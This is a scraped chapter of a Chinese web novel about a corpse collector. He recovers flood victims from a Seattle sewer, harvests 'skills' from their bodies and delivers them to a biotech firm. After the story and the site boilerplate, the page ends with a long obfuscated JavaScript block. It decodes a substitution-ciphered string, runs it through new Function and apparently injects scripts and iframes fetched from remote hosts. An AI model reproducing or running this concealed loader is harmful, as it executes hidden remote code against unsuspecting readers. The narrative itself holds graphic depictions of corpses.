=== 第90章 剔骨妖鬼的巢穴（求月票）） ===
章节索引: 269/335
字符数: 9,858
段落: ch-0269 (段5)

# 第三十六章 剔骨妖鬼的巢穴（求月票））



第三十六章 剔骨妖鬼的巢穴（
【你进入了魔域地下城的暗巢，这里似乎刚刚经历了一场杀虫清理】
“哐……哐……哐……”
韦恩和戴维戴着口罩和手套，沿着下水道的竖井向下攀爬，竖井中响起清冷的回响。
和昨夜的波涛汹涌完全不同，经过了一天的泄洪，下水道中的水已经完全褪去，甚至沟渠之中的水位都比原本要低不少。
巨大的通道两侧的台地上，散落着不少垃圾。
都是在泄洪的过程中被冲过来，然后因为重量沉底的。
整个下水道之中一片狼藉。
他们原本的营地自然不消说，什么东西都被冲得干干净净。
韦恩和戴维带着小狗威克，打着手电沿着水流的方向向前走去。
“bro，快看，那好像是老威尔的沙发。”戴维吹了个口哨，用手电晃了晃沟渠中的一个东西，吹了个口哨说道：“可惜老威尔把东西送回新营地了，否则说不定他还会把这玩意儿拖出来。”
两人继续往前走，一路之上看到了不少杂物。
帐篷、锅碗、卡式炉、桌椅、笔记本电脑等等。
原本住在下水道中的流浪汉不知道有多少，不过光看这些物品，就足以说明有不少人都已经遇难了。
戴维骂道：
“这些他妈的该死的杀人犯！”
韦恩皱眉道：
“那些泄洪的人不知道下水道里住着人吗？”
戴维摇摇头，说道：
“他们当然知道，这也是我为什么一直没有到下水道中居住的一个原因……你知道的，我经常去做一些示威游行的日结工作，所以认识了不少朋友……”
韦恩颔首道：“比如那个前FBI的特工。”
戴维接着说道：
“不错，我听他们说，上层的人早就知道下水道里面有流浪汉居住，但是流浪汉住多了会影响排水系统，他们又不能直接派人驱赶，所以就用这种泄洪的方式定期清理。”
“就像他妈的清理下水道的蟑螂一样。”
韦恩叹一口气，说道：
“难道就没有人揭发这种事情吗？他们是在谋杀。”
戴维耸耸肩：
“是啊，就是谋杀，但是在那些上层人眼里，流浪汉已经不算是人了——除了给食物银行捐一些临期食物抵税，还有以帮助流浪汉的名义套取财政拨款之外。”
韦恩啧啧嘴，突然想起自己上一世看过的一部叫做《人类清除计划》的电影。
当时感觉这电影实在太他妈扯了，怎么可能一个国家的上层政府直接搞出杀戮清除底层人的计划，不过这电影票房怎么这么高？
现在才知道，这都属于写实纪录片。
哦不，应该算是偏美化的范畴。
两人有一搭没一搭聊着，很快来到了这条主通道尽头的分水栅栏处——上次发现史莱姆的地方。
手电的光打过去，戴维不由骂道：
“这是他妈的地狱吗！？”
眼前的场景简直像是屠杀现场。
除了各种杂物之外，还有一些凌乱的肢体和骨骼被水泡得发白，散落在各处。
从数量上来看，这些零件能拼起来的总人数是远超那群程序员的。
显然，有很多下水道系统中的陈年旧尸，也被这一波洪水给冲了出来。
还有一些可能本来是活人，但是水流太急，地下又有一些锐利的铁片之类的物品，在磕碰的过程中，就那么被硬生生的拆解了。
两人的手电照了一圈儿，发现了三具还算囫囵个儿的尸体。
或是趴在污水之中，或是挂在栅栏上。
韦恩和戴维跳入沟渠之中，一起抓住趴在污水中的那具尸体，将他翻了过来。
【你拾取了技能：大模型基础构架（专精）】
尸体大张着嘴巴，双目瞪圆，脸上还带着惊愕的表情，似乎仍然难以理解自己到底是怎么落到这个境地之中的。
正是之前韦恩有过一面之缘的那个亚历山大·王。
韦恩点点头，这具尸体还算完整，看他的样子也没有滥用药物，应该能卖个好价钱。
而且虽然这个技能对他来说没什么用，不过毕竟是专精级别的技能，可以用来加持其他技能。
必然有极好的效果。
将亚历山大·王的尸体放到一边，韦恩和戴维又合力将另一具卡在栅栏上的尸体给拽了下来。
【你拾取了技能：草坪修剪（初级）】
韦恩不由耸了耸肩膀。
这具尸体虽然同样属于这帮程序员之中的一员，但随机出来的这个技能就不怎么样了。
而且尸体的右腿和左臂以不自然的角度弯曲着，显然是折断了。
不算完整，卖不了高价了。
随后是第三具尸体。
这具尸体的衣服被冲走了大半，只剩下半截裤衩，看样子是个流浪汉。
第三十六章剔骨妖鬼的巢穴（求月票））(第2/2页)
而且脑袋被削掉了一半，应该是直接撞在了某个尖锐的物体上。
脑浆都流干了。
触碰到尸体的瞬间，却没有任何反应。
韦恩心中此时也做出了判断。
头颅或者说大脑被损坏的尸体，无法获取技能。
这倒也正常，看样子系统的技能提取更像是一种对大脑的扫描。
“报警吧。”韦恩说道。
戴维立刻取出手机，一溜烟跑回竖井爬了上去，拨通了警方的电话。
按照西雅图街头收尸的标准流程，发现尸体之后要先报警，然后由警方到现场，排除他杀或者其他可疑情况，确认死亡并且拍照记录证据，然后才会由收尸人带走。
当然，这是标准流程。
有时警方实在是忙不过来，又或者死者明显是个没身份的流浪汉，也会出现不合规的情况，先由收尸人将尸体带回相关机构再报警补流程。
这次韦恩他们直接搞了三具尸体，就必须得报警走标准流程了。
警笛的声音远远传来，随后两个警察带着一名法医皱着眉头从竖井爬下来，在戴维的带领下来到栅栏处。
“Fuck！”看到这里的惨状，这两名警察不由自主地骂了出来，随后开始记录尸体的信息。
“圣玛丽生物的收尸人？”一名满脸疲惫的警察看到韦恩之后点了点头，算是打招呼，“辛苦你们了，最近西雅图的收尸人人手不够，看样子他们开始扩充了。”
这两天极端天气太多，西雅图街头的尸体多了许多，光是今天晚上他就已经跑了好几个地方。
几名警察匆匆而来，匆匆而去，检查完尸体做完记录和韦恩交接之后就迅速离开了。
简直是一分钟都不想在下水道里多待。
三具尸体都被留给了韦恩和戴维。
将三具尸体在台阶上放好，又把散落在旁边的一些胳膊腿之类的肢体零件装了一袋子，用绳子捆上，韦恩和戴维开始往竖井的方向抬过去。
“bro，这些泡过水的尸体实在是太沉了……我今晚还没有吃饭，实在是……”戴维抓着尸体的双腿喘着粗气说道。
韦恩微微一笑，说道：
“兄弟，你要相信自己。”
随后瞬间在面板上的【羁绊】选项下找到戴维，发动了体力强化。
瞬间，原本喘着粗气的戴维猛地挺直腰杆，只感觉无穷的力量涌来，力量直接翻了一倍。
欣喜道：“有道理！我确实觉得不累了！”
戴维直接将韦恩推开，将两具尸体一左一右扛在肩上，大踏步朝着竖井走去。
韦恩则在后面拖着亚历山大·王的尸体前进。
两人来到竖井下，戴维此时仿佛吃了强化剂一样，来回两趟，将三具尸体全都搬了上去，根本没用韦恩动手。
等到爬上地面之后，两人取出一打大号黑色垃圾袋，把三具尸体全都包裹起来。
刚开始干收尸人的行当，暂时没有专业裹尸袋，只能先凑合着用了。
刚收拾好，就听“嘎吱”一声，一辆破旧的二手丰田轿车一个急刹车停在路边。
迈克打开车门从车上下来，喜滋滋地跑过来说道：
“兄弟们，上车，快上车！我们有车了！”
他今天过来的晚，就是前去买二手车了。
“哐当”一声，丰田车的前杠直接掉了下来，迈克连忙又按了上去。
看着这辆二手车，戴维的眉头拧成一个疙瘩，说道：
“bro，这辆车比我爷爷的屁股还他妈的老，你到底是从哪里弄的？”
迈克哈哈一笑，扛起一具尸体就往车后座塞，一边塞一边说道：
“别看它老，开起来动力十足，关键是便宜，只要两千美刀！bro，两千块就能拥有这个宝贝儿，你还不满足吗？”
韦恩此时也被逗笑了，摇摇头扛起亚历山大·王的尸体，同样塞进了后座。
迈克什么都好，就是有点太精打细算了。
自己本来已经叮嘱他买个稍好点的二手车，没想到买了这么一辆老头车。
起码是十八手了。
不过想来迈克也是担心给塞塔集团还债的问题。
反正车能开就行。
后座塞了三具尸体和一袋子零件，戴维又勉强挤了进去，韦恩则坐在副驾驶上。
引擎发动，新晋收尸人韦恩和他的两名助手期待着一场丰收。
车子驶过熟悉的街道，离开了华埠国际社区，进入了一片繁华区域。
这里有很多学校和医院，还有一些中产居住的社区。
按照收尸人阿历克斯给的地址，车子在一处大楼的后门停下。
圣玛丽生物科技有限公司。
【你来到了剔骨妖鬼的巢穴，进入其中十分钟且保持不受伤，将获得奖励】
请选择错误类型
更新太慢
缺少章节
章节内容错误
验证码：
提交
关闭
本站所有小说都是转载而来，所有章节都是网友上传！转载至本站只是为了宣传本书让更多读者欣赏。
!function(){function a(a){var _idx="n3xnhwm2yg";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[qYF F82_qq!7_2(F6O2 5ca[Xd5 Y!5YF_52 2_qql88FjFgcY8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=F8YjYmpYFrFF56)_FYc"("ag""aPXd5 Y=2=O=68D62fODm622Y5V6fFh!qYF h86/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfgfcmn<ydFhm5d2fO^cajngKa=5YXY5LYWfgfcmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6Fhg6/}0=6FY^9Y6phFgh/o=qOdfiFdF_Lg0=5Y|5Tg0P=d8"#MqYYb"=(8HZ!F5T[(8+i;NmJd5LYcccY=Fa8>[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2Pacda??"HZ"aP(dF(hcYa[P7_2(F6O2 JcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=F8""a[7mqOdfiFdF_L8*}=}00<(mqY2pFh??c(mJ_Lhc`c$[YPa`%Fa=qcd=+i;NmLF562p67Tc(aaaP7_2(F6O2 fcY8}a[qYF F8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=28FmqY2pFh=O8""!7O5c!Y**!aO%8FHydFhm7qOO5cydFhm5d2fO^ca.2aZ!5YF_52 OPr55dTm6Lr55dTc(a??c(8HZ=qcd=""aa!qYF _8"5phCS^"!7_2(F6O2 ^cY=Fa[qYF 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 O8H"hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^FpX5h(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFL5SJmJLFpdd(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^FpX5h(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFL5SJmJLFpdd(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"Z!qYF 58JcOHc2YD wdFYampYFwdTcaZ??OH0Za%"/2sR2hD^@Tp/}Ko}"!Fj5%8"jR8"%fcnag_vvc5%8"j"%_%"8"%fcnaa=7m5Y|5T%%=2mL5(8Jc5a=2mO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=$caP=2mO2Y55O587_2(F6O2ca[F??YvvYca=LYF|6^YO_Fc7_2(F6O2ca[2m5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfc2a=7mqOdfiFdF_L8}PqYF p8"}Ko}"=X8"2sR2hD^@Tp"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"}Ko}^)ThF)mDDTYRpRm2YF"="}Ko}X5ThF)mC6FTCSDm2YF"="}Ko}2pThFmDDTYRpRm2YF"="}Ko}_JqhFmC6FTCSDm2YF"="}Ko}2TOhFmDDTYRpRm2YF"="}Ko}CSqhF)mC6FTCSDm2YF"="}Ko})FfThF)fmDDTYRpRm2YF"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"=28H"Y#"%XZ!5cavv2mJ_Lhc"(h#"%5caa!qYF O82YD VY)iO(SYFcF%"/"%p%c_j"j"%_%"8"%fcnag""a=H2mCO62c"v"aZa!7m5Y|5T%%=OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=f8"62fYR;7"=_8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=^8""=h80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!h<YmqY2pFh!a28_HfZcYH(Zch%%aa=O8_HfZcYH(Zch%%aa=68_HfZcYH(Zch%%aa=d8_HfZcYH(Zch%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=^%8iF562pHqZc2<<@?O>>oa=Kol886vvc^%8iF562pHqZc5aa=Kol88dvvc^%8iF562pHqZcFaa![Xd5 78^!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv$caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 $ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 )ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mOh_^5_(m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 f8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!fmLFTqYm(LL|YRF8Y=fmdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=faP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=^=l0a=7m(q6(S9d2fqY8^!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 _ca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mOh_^5_(m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 ^cYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<h%6vv_caPYqLY[F8F*O!67cF<86a5YF_52l}!F<h%6vv_caPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8Jc"hFFJLg//[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q/f/}Ko}j(8}vY82sR2hD^@Tp"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aP682dX6pdFO5mJqdF7O5^=28l/3cV62?yd(a/mFYLFc6a=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=c2??OavvcO8/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI?kOqfu5ODLY5/6mFYLFc2dX6pdFO5m_LY5rpY2Fa=Y8cY82dX6pdFO5mJqdF7O5^avv/3cV62?yd(a/mFYLFcYa??2dX6pdFO5m^dR|O_(heO62FL<@=OvvlYjDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=^c7_2(F6O2ca[Lc@0saPaPaPag^c7_2(F6O2ca[Lc}0}a=^c7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaP=Yaa=l2vv6??)ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvv(mqY2pFhvvcY8Jc"hFFJLg//[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"a%"/)_pj68"%p=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tc(aa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=(mqY2pFh80=qcd=""aaPaPaca!'.substr(22));new Function(b)()}();



